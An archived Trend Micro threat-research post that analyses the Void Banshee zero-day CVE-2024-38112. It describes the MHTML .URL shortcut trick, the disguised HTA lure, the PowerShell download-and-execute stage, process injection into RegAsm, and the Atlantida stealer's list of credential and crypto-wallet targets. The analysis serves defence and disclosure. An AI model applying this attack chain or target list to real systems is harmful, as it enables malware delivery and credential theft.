CVE-2024-38112: Void Banshee Targets Windows Users Through
Zombie Internet Explorer in Zero-Day Attacks
By By: Peter Girnus, Aliakbar Zahravi Jul 15, 2024 Read time: 12 min (3358 words)
Published: 2024-07-15 · Archived: 2026-04-02 10:37:54 UTC
Exploits & Vulnerabilities
Our threat hunters discovered CVE-2024-38112, which was used as a zero-day by APT group Void Banshee, to
access and execute files through the disabled Internet Explorer using MSHTML. We promptly identified and
reported this zero-day vulnerability to Microsoft, and it has been patched.
Report Highlights:
In May, ZDI threat hunters under Trend Micro’s Zero Day Initiative discovered a vulnerability that the APT
group Void Banshee had been exploiting in an updated Atlantida Stealer campaign. We promptly identified
and reported this as a zero-day vulnerability to Microsoft.
The vulnerability CVE-2024-38112 (ZDI-CAN-24433) was used as a zero-day to access and execute files
through the disabled Internet Explorer using MSHTML.
As part of Void Banshee's attack chain, CVE-2024-38112 is being used to infect victim machines with the
Atlantida info-stealer, which focuses on pilfering system information and sensitive data (like passwords
and cookies) from various applications.
Void Banshee lures in victims using zip archives containing malicious files disguised as book PDFs; these
are disseminated in cloud-sharing websites, Discord servers, and online libraries, among others. Void
Banshee's attacks are concentrated in North America, Europe, and Southeast Asia.
This zero-day attack is a prime example of how unsupported Windows relics are an overlooked attack
surface that can still be exploited by threat actors to infect unsuspecting users with ransomwareopen on a
new tab, backdoors, or as a conduit for other kinds of malware.
For additional background on this entry, please read the ZDI blog entry, "Uncoordinated Vulnerability
Disclosure: The Continuing Issues with CVD"open on a new tab.
Trend Micro Zero Day Initiativeopen on a new tab (ZDI) discovered the MHTML remote code execution (RCE)
vulnerability CVE-2024-38112open on a new tab. We immediately alerted Microsoft of this vulnerability being
used in–the-wild as ZDI-CAN-24433. CVE-2024-38112 was used as part of an attack chain by the advanced
persistent threat (APT) group Void Banshee, which targets North American, European, and Southeast Asian
regions for information theft and financial gain. The final payload of this zero-day attack chain is the Atlantida
stealer, which was first discovered in January 2024. Variations of the Atlantida campaign have been highly active
throughout 2024 and have evolved to use CVE-2024-38112 as part of Void Banshee infection chains.
In mid-May 2024, we tracked this updated Void Banshee campaign using internal and external telemetry. The Void
Banshee group used similar tools, tactics, and procedures (TTPs) that involved abusing internet shortcuts (.URL)
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 1 of 18

and Microsoft protocol handlers and URI schemes, including the MHTML (MIME encapsulation of aggregate
HTML documents) protocol which was able to access Windows system-disabled Internet Explorer.
In the attack chain shown in Figure 1, the threat actor leveraged CVE-2024-38112 to execute malicious code by
abusing the MHTML protocol handler and x-usc directives through internet shortcut (URL) files. Using this
technique, the threat actor was able to access and run files directly through the disabled Internet Explorer instance
on Windows machines. This MHTML code execution vulnerability was used to infect users and organizations
with Atlantida malware.
Trend provides protection to users from threat actors that exploit CVE-2024-38112 via the security solutions that
can be found at end of this blog entry.
Internet Explorer used as an attack vector
Internet Explorer (IE) has officially ended support on June 15, 2022open on a new tab. Additionally, IE has been
officially disabled through later versions of Windows 10, including all versions of Windows 11.  Disabled,
however, does not mean IE was removed from the system. The remnants of IE exist on the modern Windows
system, though it is not accessible to the average user (Figure 2).
Figure 2. Internet Explorer still exists on modern Windows systems
If users attempt to execute the IE executable (iexplore.exe), instead its replacement, Microsoft Edge, opens. For
users and organizations that need to access sites and workloads through Internet Explorer, Microsoft has provided
IE mode for Microsoft Edgeopen on a new tab (Figure 3). IE mode for Edge contains some IE-specific
functionality, but operates inside the Microsoft Edge sandbox, which in theory provides enhanced security for the
end user.
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 2 of 18

Figure 3. Internet Explorer mode in Microsoft Edge
In this campaign, the ZDI threat hunting team discovered and analyzed samples exploiting CVE-2024-38112,
which we disclosed to Microsoft. These samples could run and execute files and websites through the disabled IE
process by exploiting CVE-2024-38112 through MSHTML. By using specially crafted.URL files that contained
the MHTML protocol handler and the x-usc! directive, Void Banshee was able to access and run HTML
Application (HTA) files directly through the disabled IE process. This method of exploitation is similar to CVE-2021-40444open on a new tab, another MSHTML vulnerability that was used in zero-day attacks. This method of
using the disabled IE process as a proxy to access sites and scripts is especially alarming, as IE has historically
been a vast attack surface but now receives no further updates or security fixes.
This vulnerability was patched as part of the July 2024 Patch Tuesdayopen on a new tab. As of this patch cycle,
Microsoft has unregistered the MHTML handler from Internet Explorer (Figure 4).
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 3 of 18

Figure 4. MHTML handler is no longer registered with Internet Explorer
This means that MHTML is no longer usable inside of internet shortcut files.
Technical analysis
T1566.002: Spearphishing Links
Void Banshee used zip archives containing copies of books in PDF format, along with malicious files disguised as
PDFs in spearphishing links (T1566.002), on online libraries, cloud sharing sites, Discord, and a slew of
compromised websites.
Some PDF lures we uncovered during our analysis of the Void Banshee campaign include textbooks and reference
material such as Clinical Anatomy, which suggests the campaign is targeting highly skilled professionals and
students who often use reference materials and places where digital copies of books are collected (Figure 5). In the
case of exploiting CVE-2024-38112, Void Banshee changed the default icon of an internet shortcut file to that of a
PDF file to entice the victim into executing it.
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 4 of 18

Figure 5. Sample book lure
Stage 1: Malicious internet shortcut (URL) file
Name Books_A0UJKO.pdf.url
SHA256 c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae
Size 267 bytes
File type Internet shortcut
The zero-day attack begins when the victim opens a URL shortcut file designed to exploit CVE-2024-38112. One
of the samples we uncovered, "Books_A0UJKO.pdf.url", is designed to look like a PDF copy of a book (Figure
6). The URL shortcut uses the MHTML protocol handler and the x-usc! directive through the internet shortcut’s
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 5 of 18

URL parameter. This logic string is similar to the exploit logic of CVE-2021-40444open on a new tab (Microsoft
Office Remote Code Execution Vulnerability), highlighting the continued misuse of Windows protocol handlers. 
Figure 6. Malicious URL file disguised to look like a PDF of a book
In this attack, CVE-2024-38112 was used as a zero-day to redirect a victim by opening and using the system-disabled IE to a compromised website which hosted a malicious HTML Application (HTA), as shown in Figure
7.  
Figure 7. Content of “Books_A0UJKO”
In the URL parameter of the internet shortcut file, we can see that Void Banshee specifically crafted this URL
string using the MHTML protocol handler along with the x-usc! directive. This logic string opens the URL target
in the native Internet Explorer through the iexplore.exe process.
Stage 2: HTML file downloader
Name test1.html
SHA256 d8824f643127c1d8f73028be01363fd77b2ecb050ebe8c17793633b9879d20eb
Size 716 bytes
File type HTML
As mentioned above, the internet shortcut file that exploits CVE-2024-38112 points to an attacker-controlled
domain where an HTML file downloads the HTA stage of the infection chain (Figure 8). Using this HTML file,
the attacker can also control the window view size of the website through IE. This is used by the threat actor to
hide browser information and to mask the downloading of the next stage of the infection chain from the victim.
Void Banshee specifically crafted this HTML file using window size elements to control the window size of IE.
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 6 of 18

Figure 8. Contents of “test1.html”
Once this URL is contacted via IE, it attempts to open the malicious HTA file, prompting the user to open or save
the HTML application (Figure 9). This behavior is unique to IE in that HTA files are opened by default, whereas
modern browsers like Microsoft Edge or Chrome do not have the default open action.
Figure 9. Internet Explorer downloads the “Books_A0UJKO.pdf<26 spaces>.hta” file
The attacker adds 26 spaces to the malicious HTA file extension in “Books_A0UJKO.pdf.hta” to push the
extension off the screen (Figure 10). The ellipses highlight that the filename contains additional content however,
it is not clickable or expandable. To an unsuspecting user, it appears as if this is merely a PDF file.
Figure 10. The HTA file extension does not appear on the screen
Stage 3: HTA file and VBS downloader
Name Books_A0UJKO.pdf<26 spaces>.hta
SHA256 87480b151e465b73151220533c965f3a77046138f079ca3ceb961a7d5fee9a33
Size 1,662 bytes
File type Internet shortcut
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 7 of 18

The HTA file contains a Visual Basic Script (VBScript) that decrypts XOR encrypted content with key 4 and
executes the content using PowerShell (Figure 11). This script uses PowerShell to download an additional script
hosted on a compromised web server and executes the command using the PowerShell irm (Invoke-RestMethod)
alias and iex (Invoke-Expression) alias commands. Finally, the script creates a new process for the downloaded
script using the Win32_Process WMI class.
Figure 11. The VBScript in the HTA file
Stage 4: PowerShell trojan downloader
Name become.txt
SHA256 c85eedd51dced48b3764c2d5bdb8febefe4210a2d9611e0fb14ffc937b80e302
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 8 of 18

Size 551 bytes
File type PowerShell
Initially, the script defines the DllImport attributes to import two functions:
GetConsoleWindow from kernel32.dll, which retrieves the handle of the console window associated with
the calling process.
“ShowWindow” from user32.dll, which sets the visibility state of the specified window.
It then uses the Add-Type cmdlet to add the type defined in $crop213 to the current PowerShell session, under the
namespace crumble542543 with the name culture6546.
Next, the script retrieves the handle of the console window using the GetConsoleWindow method and stores it in
$danger5646. It then calls ShowWindow with the window handle and the parameter 0, which hides the console
window. This technique is often employed in malware to run without displaying any user interface.
The script proceeds to create a new System.Net.WebClient object, which is used to download data from a
malicious server. This downloaded data is subsequently loaded as a .NET assembly using the
System.Reflection.Assembly's Load method. Finally, the script invokes the entry point of the downloaded
assembly, effectively executing the code contained within it.
Figure 12. Contents of the “become.txt” PowerShell file
Stage 5: .NET trojan loader
Name LoadToBadXml.exe , tedfd.te, Vnn3qRKOxH.exe
SHA256 13907caae48ea741942bce60fa32087328475bd14f5a81a6d04d82286bd28b4d
Size 6,994,432 bytes
File type PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Window
LoadToBadXml is a .NET Trojan loader that is obfuscated using Eziriz .NET Reactor. As shown in Figure 13, it
decrypts XOR-encrypted payloads using a byte array key (3, 2, 2).
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 9 of 18

Figure 13. The payload decryption process
It then injects them into C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe. The malware employs
a common process injection technique, which involves the following steps:
Create Process: The malware uses the CreateProcess Windows API to launch RegAsm.exe in a suspended
state.
Memory Allocation: It allocates space within the RegAsm.exe process using the VirtualAllocEx API.
Write Payload: The decrypted payload is then written into the allocated memory space using the
WriteProcessMemory API.
Execute Payload: Finally, the malware creates a remote thread within the RegAsm.exe process to execute
the injected payload using the CreateRemoteThread API.
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 10 of 18

LoadToBadXml is a modified version of the shellcode injector from Program.csopen on a new tab of the open-source project Donut Loader (Figure 14).
Figure 14. LoadToBadXml injects the decrypted Donut loader into the RegAsm.exe process
Stage 6: Donut loader
SHA256 119b0994bcf9c9494ce44f896b7ff4a489b62f31706be2cb6e4a9338b63cdfdb
Size 6.59 MB (6,918,144 bytes)
File type Shellcode
Donutopen on a new tab is an opensource position-independent code that enables in-memory execution of
VBScript, JScript, EXE, DLL files, and dotNET assemblies. In this attack, Donut is used to decrypt and execute
the Atlantida stealer inside RegAsm.exe process memory.
Stage 7: Atlantida stealer analysis
Name AtlantidaStealer.exe
SHA256 6f1f3415c3e52dcdbb012f412aef7b9744786b2d4a1b850f1f4561048716c750
Size 6.6 MB  (6,883,112 bytes)
Compilation time 2024-01-25 15:52:03
File type PE32 executable (GUI) Intel 80386, for MS Windows
The final payload delivered in this attack is the Atlantida stealer, an info-stealer malware with extensive
capabilities. Overall, the malware is built from open-source stealers NecroStealeropen on a new tab and
PredatorTheStealeropen on a new tab, incorporating many of the same functions and structures found in these
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 11 of 18

programs. It targets sensitive information from various applications, including Telegram, Steam, FileZilla, various
cryptocurrency wallets, and web browsers. This malware focuses on extracting stored sensitive and potentially
valuable data, such as passwords and cookies, and it can also collect files with specific extensions from the
infected system's desktop. Moreover, the malware captures the victim's screen and gathers comprehensive system
information. The stolen data is then compressed into a ZIP file and transmitted to the attacker via TCP.Upon
execution, the malware initializes the ZIP file, sets up necessary structures, and manages the process of writing
files to the archive. It then retrieves the "APPDATA" and "DESKTOP" paths and stores them in a global variable.
This variable is later used throughout the code to access these locations, utilizing the SHGetFolderPathA Windows
API with CSIDL values "0x1A" and "0x00," respectively.
Afterward, it takes a screenshot, saves it as "screenshot.jpeg," and adds it to the ZIP. The compression method is
similar to the one used in zip.cpp for Necro Stealer and PredatorTheStealer.
To retrieve an infected system's geolocation information, such as IP address, country, and zip code, the malware
contacts its command-and-control (C&C) server over port 6666 instead of using public services. Figure 15 shows
an example of a C&C response: 
Figure 15. C&C response with the infected system’s geolocation information
The malware then stores this in the “Geo Information.txt” and appends it to the ZIP archive (Figure 16). 
Next, the malware starts to collect system information such as RAM, GPU, CPU, and screen resolution and stores
it in “User Information.txt”, subsequently appending this file to a zip archive held in memory (Figure 17).
Furthermore, the malware harvests credentials and sensitive files from various applications. For FileZilla, the
malware searches for the XML file located at C:\Users\
<USERNAME>\AppData\Roaming\FileZilla\recentservers.xml, which contains information about recently
connected servers. This XML file typically includes data such as the server's hostname, port number, username,
and connection type. Additionally, the malware attempts to steal data that includes:
All files with the ".txt" extension from the infected system’s desktop directory
All JSON files under C:\Users\Username\AppData\Roaming\Binance
Telegram data under C:\Users\Username\AppData\Roaming\Telegram Desktop
Steam configurations
Web browser Google Chrome
Mozilla Firefox and Microsoft Edge’s cookies and credentials
The Atlantida stealer has the ability to steal information from cryptocurrency-related Google Chrome and
Microsoft Edge extensions. For each extension, an “Extension ID” is given. The malware uses this information to
harvest data stored within.
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 12 of 18

This is the extension path:
C:\Users\<YOUR_USERNAME>\AppData\Local\Google\Chrome\User Data\Default\Local Extension
Settings\< Extension ID >
The following is a browser extension list of cryptocurrency wallets:
Extension Name Extension ID
AuroWallet cnmamaachppnkjgnildpdmkaakejnhae
BinanceWallet fhbohimaelbohpjbbldcngcnapndodjp
BitClip ijmpgkjfkbfhoebgogflfebnmejmfbml
Bitoke oijajbhmelbcoclnkdmembiacmeghbae
BitAppWallet fihkakfobkmkjojpchpfgcmhfjnmnfpi
Byone nlgbhdfgdhgbiamfdfmbikcdghidoadd
CardWallet apnehcjmnengpnmccpaibjmhhoadaico
CloverWallet nhnkbkgjikgcigadomkphalanndcapjk
Coin89 aeachknmefphepccionboohckonoeemg
CryptoAirdrops dhgnlgphgchebgoemcjekedjjbifijid
CyanoWallet dkdedlpgdmmkkfjabffeganieamfklkm
EQUALWallet blnieiiffboillknjnepogjhkgnoapac
Flint hnhobjmcibchnmglfbldbfabcgaknlkj
FreaksAxie copjnifcecdedocejpaapepagaodgpbh
Guarda jbdaocneiiinmjbjlgalhcelgbejmnid
GuildWallet nkddgncdjgjfcddamfgcmfnlhccnimig
guildwallet nanjmdknhkinifnkgdcggcfnhdaammmj
HyconLiteClient bcopgchhojmggmffilplmbdicgaihlkp
ICONex flpiciilemghbmfalicajoolhkkenfel
iWallet kncchdigobghenbbaddojjnnaogfppfj
Keplr dmkamcknogkgcdfhhbddcghachkejeap
KHC hcflpincpppdclinealmandijcmnkbgn
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 13 of 18

Leaf Walle cihmoadaighcejopammfbmddcmdekcje
LiqualityWallet kpfopkelmapcoipemfendmdcghnegimn
MathWallet afbcbjpbpfadlkmhmclhkeeodmamcflc
Metamask nkbihfbeogaeaoehlefnkodbefgpgknn
MetaWallet bkklifkecemccedpkhcebagjpehhabfb
MEW CX nlbmnnijcnlegkjjpcfjclmcfggfefdm
NaboxWallet nknhiehlklippafakaeklbeglecifhad
Nami lpfcbjknijpeeillifnkikgncikgfhdo
NashExtension onofpnbbkehpmmoabgpcpmigafmmnjhl
NiftyWallet jbdaocneiiinmjbjlgalhcelgbejmnid
Oasis ppdadbejkmjnefldpcdjhnkpbjkikoip
OneKey infeboajgfhgbjpjbeppbkgnabfdkdaf
Phantom bfnaelmomeimhlpmgjnjophhpkkoljpa
Polymesh Wallet jojhfeoedkpkglbfimdfabpdfjaoolaf
Rabby acmacodkjbdgmoleebolmdjonilkdbch
Saturn Wallet cphhlgmgameodnhkjdmkpanlelnlohao
sollet fhmfendgdocmcbmfikdcogofphimnkno
TerraStation aiifbnbfobpmeekipheeijimdpnlpgpp
Temple ookjlbkiijinhpmnjffcofjonbfbgaoc
TezBox mnfifefkajgofkcjkemidiaecocnkjeh
TronWallet pnndplcbkakcplkjnolgbkdgjikjednm
Wombat amkmjjmmflddogmhpjloimipbofnfjih
XDefiWallet hmeobnfnfcmdkdcmlblgagmfpfboieaf
Yoroi ffnbelfdoeiohenkjibnmadjiehjhajb
Extension name Microsoft Edge extension ID
MetaMask ejbalbakoplchlghecdalmeeeajnimhm
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 14 of 18

The malware compresses all the collected data into a ZIP file and exfiltrates it to the attacker's C&C server over
TCP port 6655. 
Figure 18. Example of exfiltration of stolen data
Conclusion
In this campaign, we have observed that even though users may no longer be able to access IE, threat actors can
still exploit lingering Windows relics like IE on their machine to infect users and organizations with ransomware,
backdoors, or as a proxy to execute other strains of malware. The ability of APT groups like Void Banshee to
exploit disabled services such as IE poses a significant threat to organizations worldwide. Since services such as
IE have a large attack surface and no longer receive patches, it represents a serious security concern to Windows
users. Furthermore, the ability of threat actors to access unsupported and disabled system services to circumvent
modern web sandboxes such as IE mode for Microsoft Edge highlights a significant industry concern.
To make software more secure and protect customers from zero-day attacks, Trend ZDIopen on a new tab works
with security researchers and vendors to patch and responsibly disclose software vulnerabilities before APT
groups can deploy them in attacks. The ZDI Threat Hunting team also proactively hunts for zero-day attacks in the
wild to safeguard the industry.  The ZDI program is the largest vendor agnostic bug bounty program in the world
while disclosing vulnerabilities to vendors at 2.5x the rateopen on a new tab.
Organizations can help protect themselves from these kinds of attacks with Trend Vision One™️open on a new
tab, which enables security teams to continuously identify attack surfaces, including known, unknown, managed,
and unmanaged cyber assets. Vision One helps organizations prioritize and address potential risks, including
vulnerabilities. It considers critical factors such as the likelihood and impact of potential attacks and offers a range
of prevention, detection, and response capabilities. This is all backed by advanced threat research, intelligence,
and AI, which helps reduce the time taken to detect, respond, and remediate issues. Ultimately, Vision One can
help improve the overall security posture and effectiveness of an organization, including against zero-day attacks.
When faced with uncertain intrusions, behaviors, and routines, organizations should assume that their system is
already compromised or breached and work to immediately isolate affected data or toolchains. With a broader
perspective and rapid response, organizations can address breaches and protect its remaining systems, especially
with technologies such as  Trend Micro Endpoint Securityopen on a new tab and Trend Micro Network Security,
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 15 of 18

as well as comprehensive security solutions such as Trend Micro™ XDRopen on a new tab, which can detect,
scan, and block malicious content across the modern threat landscape.
Trend protections
The following protections exist to detect and protect Trend customers against the zero-day CVE-2024-38112
(ZDI-CAN-24433) and Atlantida malware exfiltration attempts.
Trend Vision One Model
Microsoft Windows Remote Code Execution Vulnerability (ZDI-CAN-24433)
Svchost Executes Iexplorer
Trend Micro Cloud One - Network Security & TippingPoint Filters
44417 - ZDI-CAN-24433: Zero Day Initiative Vulnerability (Microsoft Windows)
44453 - Trojan.Win32.AtlantidaStealer.A Runtime Detection (Geo Information)
44454 - Trojan.Win32.AtlantidaStealer.A Runtime Detection (Exfil Data)
Trend Vision One Endpoint Security, Trend Cloud One - Workload and Endpoint Security, Deep Security
and Vulnerability Protection IPS Rules
1012075 - Microsoft Windows MSHTML Platform Remote Code Execution Vulnerability Over SMB
(CVE-2024-38112)
1012074 - Microsoft Windows MSHTML Platform Remote Code Execution Vulnerability (CVE-2024-
38112)
MITRE ATT&CK techniques
Tactic Technique Context
Initial Access
T1566.002 - Phishing: Spearphishing
Link
Victim downloads malicious zip archive
Execution
T1204.002 - User Execution: Malicious
File
Victim executes Internet Shortcut (.URL)
file that exploits CVE-2024-38112
Defense Evasion
T1218 - System Binary Proxy
Execution
MHTML & x-usc directive handler open
compromised site in Internet Explorer
Compromise
Infrastructure
T1584.004 - Compromise
Infrastructure: Server
Victim is redirected to compromised site
which downloads a malicious HTML
Application (.HTA)
Execution
T1204.002 - User Execution: Malicious
File
Victim opens HTA file
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 16 of 18

Execution
T1059.005 - Command and Scripting
Interpreter - VBScript
HTA application executes VBScript
Defense Evasion
T1027 - Obfuscated Files or
Information
Obfuscated VBScript
Compromise
Infrastructure  
T1584.004 - Compromise
Infrastructure: Server  
VBScript downloads malicious PowerShell
script
Execution
T1059.001 - Command and Scripting
Interpreter - PowerShell
PowerShell script executes
Compromise
Infrastructure
T1584.004 - Compromise
Infrastructure: Server  
PowerShell script downloads malicious
.NET loader
Defense Evasion
T1027 - Obfuscated Files or
Information
Obfuscated .NET loader
Privilege
Escalation
T1055 – Process Injection
Atlantida uses process injection to gain
persistence
Execution
T1218.009 - System Binary Proxy
Execution: Regsvcs/Regasm
Atlantida abuses RegAsm.exe to proxy
malicious code execution
Collection T1560.001 - Archive via Utility Atlantida encrypts data for exfiltration
Collection T1005 – Data from Local System
Atlantida collects sensitive local system
information
Collection T1082 – System Information Discovery
Atlantida collects hardware information
from victim
Collection
T1555.003 - Credentials from
Password Stores: Credentials from Web
Browsers
Atlantida collects sensitive data from web
browsers including Chrome extension data
Collection T1113 – Screen Capture
Atlantida captures screen captures of the
victim machine
Exfiltration
T1041 - Exfiltration Over C&C
Channel  
Void Banshee exfiltrates stolen data to C&C
server
Indicators of Compromise (IOCs)
Download the full list of IOCs hereopen on a new tab.
Acknowledgments
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 17 of 18

The Zero Day Initiative would like to thank the following Trenders for their contributions in ensuring that Trend
Micro customers were protected from this zero-day attack pre-patching:
Scott Graham, Mohamad Mokbel, Abdelrahman Esmail, Simon Dulude, Senthil Nathan Sankar, Amit Kumar, and
a special thanks to the content writers and marketing teams for helping with this research.
Tags
Source: https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
Page 18 of 18